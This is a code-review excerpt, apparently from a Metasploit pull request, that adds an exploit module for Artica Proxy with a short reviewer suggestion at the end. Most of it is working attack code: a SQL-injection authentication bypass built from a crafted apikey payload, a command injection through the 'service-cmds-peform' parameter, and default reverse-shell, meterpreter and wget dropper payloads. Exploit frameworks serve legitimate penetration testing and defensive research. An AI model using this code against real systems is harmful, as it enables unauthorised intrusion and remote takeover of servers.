modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb

```diff
@@ -0,0 +1,151 @@
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/unix/reverse_perl',
+            }
+          ],
+          [
+            'Linux Dropper',
+            'Platform' => 'linux',
+            'Arch' => [ARCH_X86, ARCH_X64],
+            'Type' => :linux_dropper,
+            'DefaultOptions' => {
+              'CMDSTAGER::FLAVOR' => 'wget',
+              'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp',
+            }
+          ],
+          [
+            'Authentication bypass',
+            'Platform' => 'linux',
+            'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],
+            'Type' => :auth_bypass,
+          ]
+        ],
+        'Privileged' => true,
+        'DisclosureDate' => 'Aug 9 2020',
+        'DefaultTarget' => 1,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable Artica Proxy', '/']),
+        OptString.new('PHPSESSID', [false, 'The cookie obtained after successful authentication, if present'])
+      ]
+    )
+
+    # XXX: https://github.com/rapid7/metasploit-framework/issues/12963
+    import_target_defaults
+  end
+
+  def check
+    @phpsessid = datastore['PHPSESSID'] || auth_bypass
+    unless @phpsessid
+      return CheckCode::Safe("Authentication failed")
+    end
+    rand_string = Rex::Text.rand_text_alphanumeric(4..16)
+    if execute_command("echo #{Rex::Text.encode_base64(rand_string)}|base64 -d").include?(rand_string)
+      CheckCode::Appears
+    else
+      CheckCode::Safe
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    print_status 'Attempting to gain RCE via CVE-2020-17505'
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'cyrus.index.php'),
+      'vars_get' => {
+        'service-cmds-peform' => "||#{Rex::Text::uri_encode(cmd, 'hex-all')}||"
+      },
+      'cookie' => "PHPSESSID=#{@phpsessid}; AsWebStatisticsCooKie=1; shellinaboxCooKie=1"
+    })
+    res ? res.body : ''
+  end
+
+  def auth_bypass
+    serialized_object = 'a:2:{s:3:"uid";s:4:"-100";s:22:"ACTIVE_DIRECTORY_INDEX";s:1:"1";}'
+    apikey = "' UNION select 1,'#{Rex::Text.encode_base64(serialized_object)}';"
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'fw.login.php'),
+      'vars_get' => {
+        'apikey' => apikey
+      }
+    })
+    return unless res && [200, 301, 302].include?(res.code)
+    res.get_cookies[/PHPSESSID=(.+?);/,1]
+  end
+
+  def exploit
+    if datastore['PHPSESSID']
+      @phpsessid = datastore['PHPSESSID']
+    else
+      print_status 'Attempting to bypass authentication via CVE-2020-17506 (SQL injection)'
+      @phpsessid = auth_bypass
+    end
+    unless @phpsessid
+      fail_with(Failure::NoAccess, "Authentication failed")
+    end
```

Comment:
```suggestion
      bypass_result = auth_bypass unless datastore['PHPSESSID']
      fail_with(Failure::NoAccess, "Authentication failed") unless bypass_result == CheckCode::Vulnerable
      @phpsessid = bypass_result.reason
    end
```

A little more to make the review suggestion work.